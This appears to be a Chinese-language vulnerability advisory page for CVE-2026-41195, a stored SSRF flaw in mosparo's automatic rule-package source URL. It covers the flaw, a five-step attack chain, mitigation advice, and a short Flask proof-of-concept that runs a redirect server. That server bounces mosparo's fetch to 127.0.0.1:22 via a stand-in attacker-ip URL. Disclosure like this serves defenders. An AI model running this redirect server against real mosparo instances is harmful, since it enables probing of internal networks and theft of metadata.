IPBUF安全漏洞报告
English
CVE-2026-41195 CVSS 5.0 中危

mosparo 存储型SSRF漏洞 (CVE-2026-41195)

披露日期: 2026-05-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41195
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
5.0 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
mosparo

相关标签

SSRFmosparo内网探测CWE-918重定向

漏洞概述

mosparo在1.4.13之前的版本中存在存储型SSRF漏洞。由于自动规则包源URL功能缺乏严格的校验机制,拥有编辑者角色的用户可配置攻击者控制的URL。服务器在获取该URL时会遵循HTTP/HTTPS重定向,且未限制私有或环回地址,导致攻击者能利用此漏洞探测内网HTTP服务,造成敏感信息泄露。

技术细节

该漏洞的核心在于mosparo对“自动规则包源URL”的处理逻辑存在缺陷。系统允许拥有编辑者权限的用户配置自定义的规则更新源,但未对目标URL进行充分的输入验证和安全限制。当服务器后台任务尝试获取用户配置的URL时,它会无条件地跟随HTTP/HTTPS重定向,并且未实施网络边界检查,允许请求指向127.0.0.1、169.254.169.254等内网或敏感地址。攻击者只需构造一个指向恶意服务器的URL,并让该服务器返回302重定向响应指向内部资源(如localhost的端口或云元数据服务),即可诱导mosparo服务器发起内部请求。由于恶意配置被持久化存储在数据库中,服务器会反复尝试获取,这构成了一个稳定的内网探测预言机。攻击者可以通过分析服务器的响应时间或错误信息,判断内网端口开放状态或窃取敏感数据。

攻击链分析

STEP 1
1
攻击者获取mosparo项目的编辑者角色权限账户。
STEP 2
2
攻击者在项目设置中找到“自动规则包源URL”配置项,输入攻击者控制的服务器地址。
STEP 3
3
攻击者控制的服务器配置了HTTP 302重定向逻辑,指向内网敏感地址(如127.0.0.1)。
STEP 4
4
mosparo服务器在后台尝试获取规则包时,请求攻击者提供的URL并跟随重定向。
STEP 5
5
mosparo服务器向内网地址发起请求,攻击者根据响应判断内网服务状态,实现SSRF探测。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept for CVE-2026-41195 # Description: This script demonstrates how an attacker can set up a malicious server # to redirect mosparo's requests to an internal address (SSRF). from flask import Flask, redirect, request app = Flask(__name__) # The internal target we want to scan (e.g., local admin panel or metadata service) INTERNAL_TARGET = "http://127.0.0.1:22" @app.route('/malicious-rule-source') def malicious_redirect(): # Log the incoming request to see if mosparo fetched the URL print(f"[+] Request received from mosparo: {request.headers.get('User-Agent')}") # Perform the redirect to the internal IP # The mosparo server will follow this redirect return redirect(INTERNAL_TARGET, code=302) if __name__ == '__main__': print("[*] Malicious redirect server listening on port 8080...") print("[*] Use this URL in mosparo's 'Automatic rule package source URL': http://attacker-ip:8080/malicious-rule-source") app.run(host='0.0.0.0', port=8080)

影响范围

mosparo < 1.4.13

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用“自动规则包源”功能,并严格审查现有配置中的URL,移除任何不可信的第三方链接。同时,管理员应监控服务器的出站网络日志,检查是否有异常的内网访问记录。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表